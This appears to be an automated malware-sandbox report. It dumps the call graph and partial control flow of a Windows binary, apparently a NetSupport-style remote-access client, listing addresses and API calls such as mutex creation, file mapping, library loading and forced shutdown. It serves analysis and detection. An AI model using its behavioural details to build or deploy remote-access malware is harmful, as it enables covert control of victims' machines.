std::locale::facet::_Facet_Register 8 API calls 92753->92754 92755 11142500 92754->92755 92756 11142517 92755->92756 92757 11063880 330 API calls 92755->92757 92758 111101b0 std::locale::facet::_Facet_Register 265 API calls 92756->92758 92757->92756 92759 1114251e 92758->92759 92760 1114253a 92759->92760 92761 11061710 293 API calls 92759->92761 92762 111101b0 std::locale::facet::_Facet_Register 265 API calls 92760->92762 92761->92760 92763 11142553 92762->92763 92764 1114256f 92763->92764 92765 11061710 293 API calls 92763->92765 92766 111101b0 std::locale::facet::_Facet_Register 265 API calls 92764->92766 92765->92764 92767 11142588 92766->92767 92768 111425a4 92767->92768 92769 11061710 293 API calls 92767->92769 92770 11061290 268 API calls 92768->92770 92769->92768 92771 111425cd 92770->92771 92772 11061290 268 API calls 92771->92772 92809 111425e7 92772->92809 92773 11142915 92775 110d1930 268 API calls 92773->92775 92778 11142cf9 92773->92778 92774 11061320 274 API calls 92774->92809 92776 11142933 92775->92776 92781 1105e820 79 API calls 92776->92781 92777 11142905 92780 11147060 std::locale::facet::_Facet_Register 21 API calls 92777->92780 92784 11061170 69 API calls 92778->92784 92779 11081e70 86 API calls 92779->92809 92780->92773 92783 11142970 92781->92783 92782 11147060 21 API calls std::locale::facet::_Facet_Register 92782->92809 92785 11142abd 92783->92785 92787 11061290 268 API calls 92783->92787 92786 11142d52 92784->92786 92789 11061a70 274 API calls 92785->92789 92788 11061170 69 API calls 92786->92788 92790 1114298e 92787->92790 92788->92791 92792 11142ad9 92789->92792 92793 11061320 274 API calls 92790->92793 92791->92742 92865 110684e0 298 API calls std::locale::facet::_Facet_Register 92792->92865 92800 1114299d 92793->92800 92794 111429d2 92797 11061290 268 API calls 92794->92797 92796 11147060 std::locale::facet::_Facet_Register 21 API calls 92796->92800 92801 111429e8 92797->92801 92798 11142b03 92799 11142b33 EnterCriticalSection 92798->92799 92811 11142b07 92798->92811 92804 11060f50 271 API calls 92799->92804 92800->92794 92800->92796 92805 11061320 274 API calls 92800->92805 92802 11061320 274 API calls 92801->92802 92820 111429f8 92802->92820 92803 11132900 86 API calls 92803->92809 92807 11142b50 92804->92807 92805->92800 92812 11061a70 274 API calls 92807->92812 92808 11081f20 86 API calls std::locale::facet::_Facet_Register 92808->92809 92809->92773 92809->92774 92809->92777 92809->92779 92809->92782 92809->92803 92809->92808 92810 11142a31 92813 11061290 268 API calls 92810->92813 92811->92799 92866 11051360 354 API calls 4 library calls 92811->92866 92867 110684e0 298 API calls std::locale::facet::_Facet_Register 92811->92867 92814 11142b66 92812->92814 92816 11142a47 92813->92816 92817 11142b7a LeaveCriticalSection 92814->92817 92823 1102b140 283 API calls 92814->92823 92815 11147060 std::locale::facet::_Facet_Register 21 API calls 92815->92820 92822 11061320 274 API calls 92816->92822 92818 11142bce 92817->92818 92819 11142b8e 92817->92819 92824 11134310 273 API calls 92818->92824 92819->92818 92828 11147060 std::locale::facet::_Facet_Register 21 API calls 92819->92828 92820->92810 92820->92815 92826 11061320 274 API calls 92820->92826 92836 11142a56 92822->92836 92825 11142b77 92823->92825 92827 11142bd8 92824->92827 92825->92817 92826->92820 92830 110d1930 268 API calls 92827->92830 92832 11142b9c 92828->92832 92829 11142a91 92831 11061170 69 API calls 92829->92831 92833 11142be6 92830->92833 92834 11142a9f 92831->92834 92840 11142010 385 API calls 92832->92840 92868 110d0170 265 API calls std::locale::facet::_Facet_Register 92833->92868 92837 11061170 69 API calls 92834->92837 92835 11147060 std::locale::facet::_Facet_Register 21 API calls 92835->92836 92836->92829 92836->92835 92838 11061320 274 API calls 92836->92838 92839 11142aae 92837->92839 92838->92836 92842 11061170 69 API calls 92839->92842 92843 11142ba7 92840->92843 92842->92785 92843->92818 92845 11147060 std::locale::facet::_Facet_Register 21 API calls 92843->92845 92844 11142c1c 92859 11142c9f 92844->92859 92869 110d1530 265 API calls 92844->92869 92848 11142bc0 92845->92848 92846 110d0a10 265 API calls 92851 11027200 780 API calls 92848->92851 92851->92818 92859->92846 92865->92798 92866->92811 92867->92811 92868->92844 92871 1112d87c 92870->92871 92872 1112d8b7 92871->92872 92873 1112d8a4 92871->92873 92894 1106c340 298 API calls 92872->92894 92875 11147af0 269 API calls 92873->92875 92876 1112d8af 92875->92876 92877 1112d903 92876->92877 92878 11142e60 std::locale::facet::_Facet_Register 265 API calls 92876->92878 92877->92659 92877->92661 92878->92877 92879->92639 92880->92644 92881->92651 92882->92657 92883->92664 92884->92663 92885->92678 92886->92686 92887->92694 92888->92676 92889->92701 92890->92671 92891->92684 92892->92680 92893->92696 92894->92876 92895 11135c20 92896 11135c29 92895->92896 92902 11135c58 92895->92902 92897 11145ef0 std::locale::facet::_Facet_Register 90 API calls 92896->92897 92898 11135c2e 92897->92898 92899 11133b00 274 API calls 92898->92899 92898->92902 92900 11135c37 92899->92900 92901 1105e820 79 API calls 92900->92901 92900->92902 92901->92902 92903 1115cca0 92904 1115ccb4 92903->92904 92905 1115ccac 92903->92905 92906 1116406b _calloc 66 API calls 92904->92906 92907 1115ccc8 92906->92907 92908 1115ccd4 92907->92908 92909 1115ce00 92907->92909 92915 1115c8e0 CoInitializeSecurity CoCreateInstance 92907->92915 92911 11163aa5 _free 66 API calls 92909->92911 92912 1115ce28 92911->92912 92913 1115ccf1 92913->92909 92914 1115cde4 SetLastError 92913->92914 92914->92913 92916 1115c955 wsprintfW SysAllocString 92915->92916 92917 1115cad4 92915->92917 92921 1115c99b 92916->92921 92918 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 92917->92918 92919 1115cb00 92918->92919 92919->92913 92920 1115cac1 SysFreeString 92920->92917 92921->92920 92922 1115caa9 92921->92922 92923 1115ca2c 92921->92923 92924 1115ca1a wsprintfW 92921->92924 92922->92920 92932 110978f0 92923->92932 92924->92923 92926 1115ca3e 92927 110978f0 266 API calls 92926->92927 92928 1115ca53 92927->92928 92937 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Tidy 92928->92937 92930 1115ca97 92938 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Tidy 92930->92938 92933 111101b0 std::locale::facet::_Facet_Register 265 API calls 92932->92933 92934 11097923 92933->92934 92935 11097936 SysAllocString 92934->92935 92936 11097954 92934->92936 92935->92936 92936->92926 92937->92930 92938->92922 92939 1102d9f4 92940 1102da01 92939->92940 92941 1102da22 92940->92941 93026 1109f5f0 273 API calls std::locale::facet::_Facet_Register 92940->93026 93027 11029490 455 API calls std::locale::facet::_Facet_Register 92941->93027 92944 1102da33 93009 11028690 SetEvent 92944->93009 92946 1102da38 92947 1102da42 92946->92947 92948 1102da4d 92946->92948 93028 110eccf0 830 API calls 92947->93028 92950 1102da6a 92948->92950 92951 1102da6f 92948->92951 93029 11059fb0 SetEvent 92950->93029 92953 1102da77 92951->92953 92954 1102daae 92951->92954 92953->92954 92961 1102daa3 Sleep 92953->92961 92955 11147060 std::locale::facet::_Facet_Register 21 API calls 92954->92955 92956 1102dab8 92955->92956 92957 1102dac5 92956->92957 92958 1102daf6 92956->92958 92957->92956 92959 1105e820 79 API calls 92957->92959 92960 1102daf3 92958->92960 93010 110b0470 92958->93010 92962 1102dae8 92959->92962 92960->92958 92961->92954 92962->92958 93030 1102d750 294 API calls std::locale::facet::_Facet_Register 92962->93030 92969 1102db3a 92970 1102db4d 92969->92970 93032 111361c0 299 API calls 5 library calls 92969->93032 92972 1100d620 FreeLibrary 92970->92972 92973 1102de59 92972->92973 92974 1102de70 92973->92974 92975 1100d330 wsprintfA 92973->92975 92977 1102de97 GetModuleFileNameA GetFileAttributesA 92974->92977 92985 1102dfb3 92974->92985 92976 1102de65 92975->92976 92978 11147060 std::locale::facet::_Facet_Register 21 API calls 92976->92978 92979 1102debf 92977->92979 92977->92985 92978->92974 92981 111101b0 std::locale::facet::_Facet_Register 265 API calls 92979->92981 92980 11147060 std::locale::facet::_Facet_Register 21 API calls 92982 1102e062 92980->92982 92983 1102dec6 92981->92983 93035 11147020 FreeLibrary 92982->93035 92987 11143630 267 API calls 92983->92987 92985->92980 92986 1102e06a 92988 1102e0a6 92986->92988 92989 1102e084 ExitWindowsEx Sleep 92986->92989 92994 1102e094 ExitWindowsEx 92986->92994 92993 1102dee8 92987->92993 92990 1102e0b6 92988->92990 92991 1102e0ab Sleep 92988->92991 92989->92994 92992 11147060 std::locale::facet::_Facet_Register 21 API calls 92990->92992 92991->92990 92995 1102e0c0 ExitProcess 92992->92995 92997 11143780 86 API calls 92993->92997 92994->92988 92998 1102df0d 92997->92998 92998->92985 92999 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 92998->92999 93000 1102df23 92999->93000 93001 1102df3e _memset 93000->93001 93033 11029a70 265 API calls 2 library calls 93000->93033 93003 1102df58 FindFirstFileA 93001->93003 93004 1102df78 FindNextFileA 93003->93004 93006 1102df98 FindClose 93004->93006 93007 1102dfa4 93006->93007 93034 111273e0 291 API calls 5 library calls 93007->93034 93009->92946 93036 110808b0 93010->93036 93015 1102db1a 93019 110eb4a0 93015->93019 93016 110b04b7 93048 11029a70 265 API calls 2 library calls 93016->93048 93020 110b0470 267 API calls 93019->93020 93021 110eb4cd 93020->93021 93064 110ea880 93021->93064 93025 1102db25 93031 110b0660 267 API calls std::locale::facet::_Facet_Register 93025->93031 93026->92941 93027->92944 93028->92948 93029->92951 93030->92960 93031->92969 93032->92970 93034->92985 93035->92986 93037 110808d4 93036->93037 93038 110808d8 93037->93038 93039 110808ef 93037->93039 93049 11029a70 265 API calls 2 library calls 93038->93049 93041 11080908 93039->93041 93042 110808ec 93039->93042 93045 110b0460 93041->93045 93042->93039 93050 11029a70 265 API calls 2 library calls 93042->93050 93051 11081590 93045->93051 93052 110815dd 93051->93052 93053 110815b1 93051->93053 93055 1108162a wsprintfA 93052->93055 93056 11081605 wsprintfA 93052->93056 93053->93052 93054 110815cb 93053->93054 93057 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 93054->93057 93063 11029a70 265 API calls 2 library calls 93055->93063 93056->93052 93059 110815d9 93057->93059 93059->93015 93059->93016 93066 110ea88b 93064->93066 93065 110ea925 93074 110b0660 267 API calls std::locale::facet::_Facet_Register 93065->93074 93066->93065 93067 110ea8ae 93066->93067 93070 110ea8c5 93066->93070 93075 11029a70 265 API calls 2 library calls 93067->93075 93069 110ea8c2 93069->93070 93076 11029a70 265 API calls 2 library calls 93069->93076 93070->93069 93071 110ea8f2 SendMessageTimeoutA 93070->93071 93071->93065 93074->93025 93077 110310d5 GetNativeSystemInfo 93078 110310e1 93077->93078 93082 11031081 93078->93082 93083 11031145 93078->93083 93091 11031088 93078->93091 93079 110312db GetStockObject GetObjectA 93080 1103130a SetErrorMode SetErrorMode 93079->93080 93084 111101b0 std::locale::facet::_Facet_Register 265 API calls 93080->93084 93086 111101b0 std::locale::facet::_Facet_Register 265 API calls 93082->93086 93085 111101b0 std::locale::facet::_Facet_Register 265 API calls 93083->93085 93087 11031346 93084->93087 93088 1103114c 93085->93088 93086->93091 93089 11028980 268 API calls 93087->93089 93145 110fae60 272 API calls std::locale::facet::_Facet_Register 93088->93145 93092 11031360 93089->93092 93091->93079 93093 111101b0 std::locale::facet::_Facet_Register 265 API calls 93092->93093 93094 11031386 93093->93094 93095 11028980 268 API calls 93094->93095 93096 1103139f InterlockedExchange 93095->93096 93098 111101b0 std::locale::facet::_Facet_Register 265 API calls 93096->93098 93099 110313c7 93098->93099 93100 1108a880 267 API calls 93099->93100 93101 110313df GetACP 93100->93101 93103 11163f93 _sprintf 102 API calls 93101->93103 93104 11031406 93103->93104 93105 111663a3 _setlocale 101 API calls 93104->93105 93106 11031410 93105->93106 93107 11143780 86 API calls 93106->93107 93108 1103143c 93107->93108 93109 111101b0 std::locale::facet::_Facet_Register 265 API calls 93108->93109 93110 1103145c 93109->93110 93111 11061aa0 301 API calls 93110->93111 93113 11031487 93111->93113 93112 110314d4 93114 110ccc90 4 API calls 93112->93114 93113->93112 93115 111101b0 std::locale::facet::_Facet_Register 265 API calls 93113->93115 93116 110314fa 93114->93116 93117 110314ae 93115->93117 93118 111101b0 std::locale::facet::_Facet_Register 265 API calls 93116->93118 93119 11061710 293 API calls 93117->93119 93120 11031501 93118->93120 93119->93112 93121 11125d40 506 API calls 93120->93121 93122 11031523 93121->93122 93123 11114fb0 268 API calls 93122->93123 93124 11031544 93123->93124 93125 111101b0 std::locale::facet::_Facet_Register 265 API calls 93124->93125 93126 1103155b 93125->93126 93127 11088b30 268 API calls 93126->93127 93128 11031573 93127->93128 93129 111101b0 std::locale::facet::_Facet_Register 265 API calls 93128->93129 93130 1103158a 93129->93130 93131 1105cdb0 325 API calls 93130->93131 93132 110315ae 93131->93132 93133 1105d1a0 428 API calls 93132->93133 93134 110315d4 93133->93134 93135 11027810 122 API calls 93134->93135 93136 110315d9 93135->93136 93137 1100d620 FreeLibrary 93136->93137 93138 110315f4 93137->93138 93139 1100d330 wsprintfA 93138->93139 93142 1103160d 93138->93142 93140 11031602 93139->93140 93141 11147060 std::locale::facet::_Facet_Register 21 API calls 93140->93141 93141->93142 93143 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 93142->93143 93144 11031773 93143->93144 93145->93091 93146 11089cf0 93147 111103d0 ___DllMainCRTStartup 4 API calls 93146->93147 93148 11089d03 93147->93148 93149 11089d0d 93148->93149 93158 11089430 268 API calls std::locale::facet::_Facet_Register 93148->93158 93151 11089d34 93149->93151 93159 11089430 268 API calls std::locale::facet::_Facet_Register 93149->93159 93154 11089d43 93151->93154 93155 11089cc0 93151->93155 93160 11089950 93155->93160 93158->93149 93159->93151 93201 11088c40 6 API calls ___DllMainCRTStartup 93160->93201 93162 11089989 GetParent 93163 1108999c 93162->93163 93164 110899ad 93162->93164 93166 110899a0 GetParent 93163->93166 93165 11145990 267 API calls 93164->93165 93167 110899b9 93165->93167 93166->93164 93166->93166 93168 11164ead std::locale::facet::_Facet_Register 143 API calls 93167->93168 93169 110899c6 std::ios_base::_Tidy 93168->93169 93170 11145990 267 API calls 93169->93170 93171 110899df 93170->93171 93202 11013dd0 22 API calls 2 library calls 93171->93202 93173 110899fa 93173->93173 93174 11143e00 std::locale::facet::_Facet_Register 8 API calls 93173->93174 93176 11089a3a std::ios_base::_Tidy 93174->93176 93175 11089a55 93177 11164c77 std::locale::facet::_Facet_Register 102 API calls 93175->93177 93179 11089a73 std::locale::facet::_Facet_Register 93175->93179 93176->93175 93178 11142e60 std::locale::facet::_Facet_Register 265 API calls 93176->93178 93177->93179 93178->93175 93180 1102ad70 std::locale::facet::_Facet_Register 145 API calls 93179->93180 93192 11089b24 std::ios_base::_Tidy 93179->93192 93182 11089ac3 93180->93182 93181 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 93183 11089c12 93181->93183 93184 11142e60 std::locale::facet::_Facet_Register 265 API calls 93182->93184 93183->93154 93185 11089acb 93184->93185 93186 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 93185->93186 93187 11089ae2 93186->93187 93188 11081e70 86 API calls 93187->93188 93187->93192 93189 11089afa 93188->93189 93190 11089b3e 93189->93190 93191 11089b01 93189->93191 93193 11081e70 86 API calls 93190->93193 93203 110b7aa0 93191->93203 93192->93181 93195 11089b49 93193->93195 93195->93192 93197 110b7aa0 68 API calls 93195->93197 93199 11089b56 93197->93199 93198 110b7aa0 68 API calls 93198->93192 93199->93192 93200 110b7aa0 68 API calls 93199->93200 93200->93192 93201->93162 93202->93173 93206 110b7a80 93203->93206 93209 111681a3 93206->93209 93212 11168124 93209->93212 93213 11168131 93212->93213 93214 1116814b 93212->93214 93230 1116a1c2 66 API calls __getptd_noexit 93213->93230 93214->93213 93215 11168154 GetFileAttributesA 93214->93215 93217 11168162 GetLastError 93215->93217 93225 11168178 93215->93225 93233 1116a1d5 66 API calls 2 library calls 93217->93233 93218 11168136 93231 1116a1af 66 API calls __getptd_noexit 93218->93231 93221 11089b07 93221->93192 93221->93198 93222 1116813d 93232 1116edc4 11 API calls __mbschr_l 93222->93232 93223 1116816e 93234 1116a1af 66 API calls __getptd_noexit 93223->93234 93225->93221 93235 1116a1c2 66 API calls __getptd_noexit 93225->93235 93228 1116818b 93236 1116a1af 66 API calls __getptd_noexit 93228->93236 93230->93218 93231->93222 93232->93221 93233->93223 93234->93221 93235->93228 93236->93223 93237 3a1020 GetCommandLineA 93238 3a1035 GetStartupInfoA 93237->93238 93240 3a108b 93238->93240 93241 3a1090 GetModuleHandleA 93238->93241 93240->93241 93244 3a1000 _NSMClient32 93241->93244 93243 3a10a2 ExitProcess 93244->93243 93245 1116a5cd 93246 1116a5dd 93245->93246 93247 1116a5d8 93245->93247 93251 1116a4d7 93246->93251 93263 11177f37 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 93247->93263 93250 1116a5eb 93252 1116a4e3 __close 93251->93252 93253 1116a530 93252->93253 93254 1116a580 __close 93252->93254 93264 1116a373 93252->93264 93253->93254 93314 11026410 7 API calls ___DllMainCRTStartup 93253->93314 93254->93250 93257 1116a560 93257->93254 93259 1116a373 __CRT_INIT@12 149 API calls 93257->93259 93258 1116a543 93258->93257 93315 11026410 7 API calls ___DllMainCRTStartup 93258->93315 93259->93254 93261 1116a557 93262 1116a373 __CRT_INIT@12 149 API calls 93261->93262 93262->93257 93263->93246 93265 1116a37f __close 93264->93265 93266 1116a387 93265->93266 93267 1116a401 93265->93267 93316 1116e390 HeapCreate 93266->93316 93269 1116a462 93267->93269 93275 1116a407 93267->93275 93270 1116a467 93269->93270 93271 1116a4c0 93269->93271 93272 1116c4ba ___set_flsgetvalue 3 API calls 93270->93272 93284 1116a390 __close 93271->93284 93410 1116c7be 79 API calls __freefls@4 93271->93410 93277 1116a46c 93272->93277 93273 1116a38c 93273->93284 93317 1116c82c GetModuleHandleW 93273->93317 93274 1116a425 93280 1116a439 93274->93280 93405 1117226e 67 API calls _free 93274->93405 93275->93274 93275->93284 93404 1116e65b 66 API calls _doexit 93275->93404 93282 1116ac7e __calloc_crt 66 API calls 93277->93282 93408 1116a44c 70 API calls __mtterm 93280->93408 93286 1116a478 93282->93286 93283 1116a39c __RTC_Initialize 93287 1116a3a0 93283->93287 93293 1116a3ac GetCommandLineA 93283->93293 93284->93253 93286->93284 93289 1116a484 DecodePointer 93286->93289 93401 1116e3ae HeapDestroy 93287->93401 93288 1116a42f 93406 1116c50b 70 API calls _free 93288->93406 93294 1116a499 93289->93294 93292 1116a434 93407 1116e3ae HeapDestroy 93292->93407 93342 11177e54 GetEnvironmentStringsW 93293->93342 93298 1116a4b4 93294->93298 93299 1116a49d 93294->93299 93302 11163aa5 _free 66 API calls 93298->93302 93409 1116c548 66 API calls 4 library calls 93299->93409 93302->93284 93304 1116a4a4 GetCurrentThreadId 93304->93284 93305 1116a3ca 93402 1116c50b 70 API calls _free 93305->93402 93309 1116a3ea 93309->93284 93403 1117226e 67 API calls _free 93309->93403 93314->93258 93315->93261 93316->93273 93318 1116c840 93317->93318 93319 1116c849 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 93317->93319 93411 1116c50b 70 API calls _free 93318->93411 93321 1116c893 TlsAlloc 93319->93321 93324 1116c9a2 93321->93324 93325 1116c8e1 TlsSetValue 93321->93325 93323 1116c845 93323->93283 93324->93283 93325->93324 93326 1116c8f2 93325->93326 93412 1116e417 EncodePointer EncodePointer __init_pointers _raise __initp_misc_winsig 93326->93412 93328 1116c8f7 EncodePointer EncodePointer EncodePointer EncodePointer 93413 11174425 InitializeCriticalSectionAndSpinCount 93328->93413 93330 1116c936 93331 1116c99d 93330->93331 93332 1116c93a DecodePointer 93330->93332 93415 1116c50b 70 API calls _free 93331->93415 93334 1116c94f 93332->93334 93334->93331 93335 1116ac7e __calloc_crt 66 API calls 93334->93335 93336 1116c965 93335->93336 93336->93331 93337 1116c96d DecodePointer 93336->93337 93338 1116c97e 93337->93338 93338->93331 93339 1116c982 93338->93339 93414 1116c548 66 API calls 4 library calls 93339->93414 93341 1116c98a GetCurrentThreadId 93341->93324 93344 11177e70 93342->93344 93347 1116a3bc 93342->93347 93343 11177e85 WideCharToMultiByte 93345 11177ea5 93343->93345 93346 11177edd FreeEnvironmentStringsW 93343->93346 93344->93343 93344->93344 93348 1116ac39 __malloc_crt 66 API calls 93345->93348 93346->93347 93355 11172029 GetStartupInfoW 93347->93355 93349 11177eab 93348->93349 93349->93346 93350 11177eb3 WideCharToMultiByte 93349->93350 93351 11177ec5 93350->93351 93352 11177ed1 FreeEnvironmentStringsW 93350->93352 93353 11163aa5 _free 66 API calls 93351->93353 93352->93347 93354 11177ecd 93353->93354 93354->93352 93356 1116ac7e __calloc_crt 66 API calls 93355->93356 93364 11172047 93356->93364 93357 1116a3c6 93357->93305 93368 11177d99 93357->93368 93358 1117213c 93361 111721bc 93358->93361 93365 11172173 InitializeCriticalSectionAndSpinCount 93358->93365 93366 11172168 GetFileType 93358->93366 93359 111721f2 GetStdHandle 93359->93361 93360 11172256 SetHandleCount 93360->93357 93361->93359 93361->93360 93363 11172204 GetFileType 93361->93363 93367 1117222a InitializeCriticalSectionAndSpinCount 93361->93367 93362 1116ac7e __calloc_crt 66 API calls 93362->93364 93363->93361 93364->93357 93364->93358 93364->93361 93364->93362 93365->93357 93365->93358 93366->93358 93366->93365 93367->93357 93367->93361 93369 11177db3 GetModuleFileNameA 93368->93369 93370 11177dae 93368->93370 93372 11177dda 93369->93372 93422 11171a45 94 API calls __setmbcp 93370->93422 93416 11177bff 93372->93416 93375 1116ac39 __malloc_crt 66 API calls 93376 11177e1c 93375->93376 93377 11177bff _parse_cmdline 76 API calls 93376->93377 93378 1116a3d6 93376->93378 93377->93378 93378->93309 93379 11177b23 93378->93379 93380 11177b2c 93379->93380 93382 11177b31 _strlen 93379->93382 93424 11171a45 94 API calls __setmbcp 93380->93424 93383 1116ac7e __calloc_crt 66 API calls 93382->93383 93386 1116a3df 93382->93386 93388 11177b66 _strlen 93383->93388 93384 11177bb5 93385 11163aa5 _free 66 API calls 93384->93385 93385->93386 93386->93309 93395 1116e46e 93386->93395 93387 1116ac7e __calloc_crt 66 API calls 93387->93388 93388->93384 93388->93386 93388->93387 93389 11177bdb 93388->93389 93390 1116cd5f _strcpy_s 66 API calls 93388->93390 93392 11177bf2 93388->93392 93391 11163aa5 _free 66 API calls 93389->93391 93390->93388 93391->93386 93393 1116ed72 __invoke_watson 10 API calls 93392->93393 93394 11177bfe 93393->93394 93396 1116e47c __IsNonwritableInCurrentImage 93395->93396 93425 1116d88b EncodePointer 93396->93425 93398 1116e49a __initterm_e 93400 1116e4bb __IsNonwritableInCurrentImage 93398->93400 93426 11163dd5 76 API calls __cinit 93398->93426 93400->93309 93401->93284 93402->93287 93403->93305 93404->93274 93405->93288 93406->93292 93407->93280 93408->93284 93409->93304 93410->93284 93411->93323 93412->93328 93413->93330 93414->93341 93415->93324 93418 11177c1e 93416->93418 93420 11177c8b 93418->93420 93423 11177590 76 API calls x_ismbbtype_l 93418->93423 93419 11177d89 93419->93375 93419->93378 93420->93419 93421 11177590 76 API calls __splitpath_helper 93420->93421 93421->93420 93422->93369 93423->93418 93424->93382 93425->93398 93426->93400 93427 11030b78 93428 11143630 267 API calls 93427->93428 93429 11030b86 93428->93429 93430 11143780 86 API calls 93429->93430 93431 11030bc3 93430->93431 93432 11030bd8 93431->93432 93433 11081e70 86 API calls 93431->93433 93434 110ed520 8 API calls 93432->93434 93433->93432 93435 11030bff 93434->93435 93436 11030c49 93435->93436 93495 110ed5d0 81 API calls 2 library calls 93435->93495 93439 11143780 86 API calls 93436->93439 93438 11030c14 93496 110ed5d0 81 API calls 2 library calls 93438->93496 93442 11030c60 93439->93442 93441 11030c2b 93441->93436 93443 11146fe0 19 API calls 93441->93443 93444 111101b0 std::locale::facet::_Facet_Register 265 API calls 93442->93444 93443->93436 93445 11030c6f 93444->93445 93446 11030c90 93445->93446 93447 11088b30 268 API calls 93445->93447 93448 1108a880 267 API calls 93446->93448 93447->93446 93449 11030ca3 OpenMutexA 93448->93449 93450 11030cc3 CreateMutexA 93449->93450 93451 11030dda CloseHandle 93449->93451 93452 11030ce3 93450->93452 93488 1108a980 93451->93488 93454 111101b0 std::locale::facet::_Facet_Register 265 API calls 93452->93454 93455 11030cf8 93454->93455 93457 11030d1b 93455->93457 93458 11061710 293 API calls 93455->93458 93456 11030df0 93459 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 93456->93459 93478 110161e0 LoadLibraryA 93457->93478 93458->93457 93460 11031773 93459->93460 93462 11030d2d 93463 11145c70 std::locale::facet::_Facet_Register 90 API calls 93462->93463 93464 11030d3c 93463->93464 93465 11030d49 93464->93465 93466 11030d5c 93464->93466 93479 111466b0 93465->93479 93468 11030d66 GetProcAddress 93466->93468 93469 11030d50 93466->93469 93468->93469 93470 11030d80 SetLastError 93468->93470 93471 110287a0 47 API calls 93469->93471 93470->93469 93472 11030d8d 93471->93472 93497 11009370 429 API calls std::locale::facet::_Facet_Register 93472->93497 93474 11030d9c 93475 11030db0 WaitForSingleObject 93474->93475 93475->93475 93476 11030dc2 CloseHandle 93475->93476 93476->93451 93477 11030dd3 FreeLibrary 93476->93477 93477->93451 93478->93462 93480 11145c70 std::locale::facet::_Facet_Register 90 API calls 93479->93480 93481 111466c2 93480->93481 93482 11146700 93481->93482 93483 111466c9 LoadLibraryA 93481->93483 93482->93469 93484 111466fa 93483->93484 93485 111466db GetProcAddress 93483->93485 93484->93469 93486 111466f3 FreeLibrary 93485->93486 93487 111466eb 93485->93487 93486->93484 93487->93486 93489 1108aa27 93488->93489 93493 1108a9ba std::ios_base::_Tidy 93488->93493 93490 1108aa2e DeleteCriticalSection 93489->93490 93498 1115c2d0 93490->93498 93491 1108a9ce CloseHandle 93491->93493 93493->93489 93493->93491 93493->93493 93494 1108aa54 std::ios_base::_Tidy 93494->93456 93495->93438 93496->93441 93497->93474 93501 1115c2e4 93498->93501 93499 1115c2e8 93499->93494 93501->93499 93502 1115c040 67 API calls 2 library calls 93501->93502 93502->93501 93503 6f9f63a0 93504 6f9f63a5 93503->93504 93505 6f9f63a9 WSACancelBlockingCall 93504->93505 93506 6f9f63b1 Sleep 93504->93506

                                                                                  Executed Functions

                                                                                  Function 1109E5B0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 774 1109e5b0-1109e612 call 1109dda0 777 1109e618-1109e63b call 1109d860 774->777 778 1109ec30 774->778 783 1109e641-1109e655 LocalAlloc 777->783 784 1109e7a4-1109e7a6 777->784 780 1109ec32-1109ec4d call 11162bb7 778->780 786 1109e65b-1109e68d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 783->786 787 1109ec25-1109ec2b call 1109d8f0 783->787 788 1109e736-1109e75b CreateFileMappingA 784->788 791 1109e71a-1109e730 786->791 792 1109e693-1109e6be call 1109d7d0 call 1109d810 786->792 787->778 789 1109e7a8-1109e7bb GetLastError 788->789 790 1109e75d-1109e77d GetLastError call 110d6c20 788->790 796 1109e7bd 789->796 797 1109e7c2-1109e7d9 MapViewOfFile 789->797 802 1109e788-1109e790 790->802 803 1109e77f-1109e786 LocalFree 790->803 791->788 823 1109e709-1109e711 792->823 824 1109e6c0-1109e6f6 GetSecurityDescriptorSacl 792->824 796->797 800 1109e7db-1109e7f6 call 110d6c20 797->800 801 1109e817-1109e81f 797->801 817 1109e7f8-1109e7f9 LocalFree 800->817 818 1109e7fb-1109e803 800->818 804 1109e8c1-1109e8d3 801->804 805 1109e825-1109e83e GetModuleFileNameA 801->805 813 1109e792-1109e793 LocalFree 802->813 814 1109e795-1109e79f 802->814 803->802 809 1109e919-1109e932 call 11162be0 GetTickCount 804->809 810 1109e8d5-1109e8d8 804->810 811 1109e8dd-1109e8f8 call 110d6c20 805->811 812 1109e844-1109e84d 805->812 835 1109e934-1109e939 809->835 819 1109e9bf-1109ea23 GetCurrentProcessId GetModuleFileNameA call 1109dc30 810->819 839 1109e8fa-1109e8fb LocalFree 811->839 840 1109e8fd-1109e905 811->840 812->811 820 1109e853-1109e856 812->820 813->814 822 1109ec1e-1109ec20 call 1109dce0 814->822 817->818 827 1109e808-1109e812 818->827 828 1109e805-1109e806 LocalFree 818->828 844 1109ea2b-1109ea42 CreateEventA 819->844 845 1109ea25 819->845 830 1109e899-1109e8bc call 110d6c20 call 1109dce0 820->830 831 1109e858-1109e85c 820->831 822->787 823->791 825 1109e713-1109e714 FreeLibrary 823->825 824->823 834 1109e6f8-1109e703 SetSecurityDescriptorSacl 824->834 825->791 827->822 828->827 830->804 831->830 838 1109e85e-1109e869 831->838 834->823 841 1109e93b-1109e94a 835->841 842 1109e94c 835->842 846 1109e870-1109e874 838->846 839->840 847 1109e90a-1109e914 840->847 848 1109e907-1109e908 LocalFree 840->848 841->835 841->842 849 1109e94e-1109e954 842->849 853 1109ea44-1109ea63 GetLastError * 2 call 110d6c20 844->853 854 1109ea66-1109ea6e 844->854 845->844 851 1109e890-1109e892 846->851 852 1109e876-1109e878 846->852 847->822 848->847 858 1109e965-1109e9bd 849->858 859 1109e956-1109e963 849->859 855 1109e895-1109e897 851->855 860 1109e87a-1109e880 852->860 861 1109e88c-1109e88e 852->861 853->854 856 1109ea70 854->856 857 1109ea76-1109ea87 CreateEventA 854->857 855->811 855->830 856->857 863 1109ea89-1109eaa8 GetLastError * 2 call 110d6c20 857->863 864 1109eaab-1109eab3 857->864 858->819 859->849 859->858 860->851 865 1109e882-1109e88a 860->865 